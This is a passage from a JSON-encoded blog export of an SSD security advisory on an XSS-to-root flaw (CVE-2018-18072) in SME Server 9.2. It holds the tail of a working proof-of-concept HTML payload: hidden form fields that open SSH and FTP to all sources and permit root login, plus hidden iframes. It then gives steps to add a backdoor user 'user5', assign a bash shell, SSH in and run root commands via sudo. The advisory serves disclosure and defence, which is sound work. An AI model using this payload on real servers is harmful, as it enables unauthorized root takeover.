class=\"crayon-s\">&#8220;https:\/\/192.168.1.109\/server-manager\/cgi-bin\/remoteaccess&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;page&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;page_stack&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;.id&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;2e7d2cda4ce6b680499d4b2ee8eb7831&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;pptpSessions&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;validFromNetwork&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;validFromMask&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;sshAccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;public&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;sshPermitRootLogin&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;yes&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;sshPasswordAuthentication&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;yes&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;sshTCPPort&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;22&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;FTPAccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;normal&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;FTPPasswordLogin&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;public&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Next&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Save&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-c\">\/form&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-94\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&lt;iframe name=&#8221;if1&#8243; style=&#8221;display:\thidden=&#8221; width=&#8221;0&#8243; height=&#8221;0&#8243; frameborder=&#8221;0&#8243;&gt;&lt;\/i<\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">iframe <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;if2&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">style<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;display:\thidden=&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">width<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">height<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">frameborder<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-c\">\/iframe&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-96\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&lt;iframe name=&#8221;if3&#8243; style=&#8221;display:\thidden=&#8221; width=&#8221;0&#8243; height=&#8221;0&#8243; frameborder=&#8221;0&#8243;&gt;&lt;\/i<\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">iframe <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;if4&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">style<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;display:\thidden=&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">width<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">height<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">frameborder<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">iframe<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-98\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0068 seconds] -->  <\/p>\n<p><strong>This Payload will:<\/strong><br \/> 1+ Add a new user, set password (user5\/SSDpassword@12345)<br \/> 2+ Assign various webpanel access to the new user<br \/> \u2022 remoteuseraccess<br \/> \u2022 viewlogfiles<br \/> \u2022 groups<br \/> \u2022 userpanelaccess<br \/> \u2022 userpanel-password<br \/> \u2022 userpanel-sshkeys<br \/> \u2022 userpanel-useraccounts<br \/> \u2022 userpanel-userbackup<br \/> 3+ Reconfigure network filtering to open SSH\/FTP access for all IP sources At this point, the attacker can log in with new user credentials, and has access to various webpanels (functionality) now.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-user5-panel.png\" data-slb-active=\"1\" data-slb-asset=\"1714433205\" data-slb-internal=\"0\" data-slb-group=\"3769\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3773\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-user5-panel-300x78.png\" alt=\"\" width=\"1005\" height=\"262\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-user5-panel-300x78.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-user5-panel-768x199.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-user5-panel-1024x266.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-user5-panel.png 1072w\" sizes=\"auto, (max-width: 1005px) 100vw, 1005px\" \/><\/a><\/p>\n<p><b>4) <\/b>Attacker adds shell configuration for this new user \u2013 user5 \u2013 as follows:<br \/> 1+ Security -&gt; User Remote Access -&gt; &#8216;user5&#8217; Modify -&gt; Select &#8216;\/bin\/bash&#8217; as Shell Access option &#8211;&gt; Save.<br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-user-5-shell-panel.png\" data-slb-active=\"1\" data-slb-asset=\"650364359\" data-slb-internal=\"0\" data-slb-group=\"3769\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3774\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-user-5-shell-panel-300x123.png\" alt=\"\" width=\"1174\" height=\"482\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-user-5-shell-panel-300x123.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-user-5-shell-panel-768x316.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-user-5-shell-panel-1024x421.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-user-5-shell-panel.png 1071w\" sizes=\"auto, (max-width: 1174px) 100vw, 1174px\" \/><\/a><br \/> 2+ Attacker SSH in to the SME Server remotely:<br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-ssh.png\" data-slb-active=\"1\" data-slb-asset=\"101361167\" data-slb-internal=\"0\" data-slb-group=\"3769\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3776\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-ssh-300x186.png\" alt=\"\" width=\"1342\" height=\"832\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-ssh-300x186.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-ssh-768x477.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-ssh-1024x636.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-ssh-825x510.png 825w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-ssh.png 1068w\" sizes=\"auto, (max-width: 1342px) 100vw, 1342px\" \/><\/a><br \/> 3+ Attacker can execute commands as root using sudo.<br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-etc-shadow.png\" data-slb-active=\"1\" data-slb-asset=\"1708163635\" data-slb-internal=\"0\" data-slb-group=\"3769\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3777\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-etc-shadow-191x300.png\" alt=\"\" width=\"492\" height=\"772\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-etc-shadow-191x300.png 191w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-etc-shadow.png 351w\" sizes=\"auto, (max-width: 492px) 100vw, 492px\" \/><\/a><\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3769\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-PHPki-page-300x85.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 07 Jan 2019 13:21:59 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes a vulnerability in SME Server 9.2, which lets an unauthenticated attackers perform XSS attack that leads to remote code execution as root. SME Server is a Linux distribution for small and medium enterprises by Koozali foundation. CVE CVE-2018-18072 Credit An independent security researcher, Karn Ganeshen has reported this vulnerability &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3769\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 SME Server Unauthenticated XSS To Privileged Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11640,11946,11682,10757],"class_list":["post-14258","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-cross-site-scripting","tag-privilege-escalation","tag-remote-code-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/14258","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=14258"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/14258\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=14258"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=14258"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=14258"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}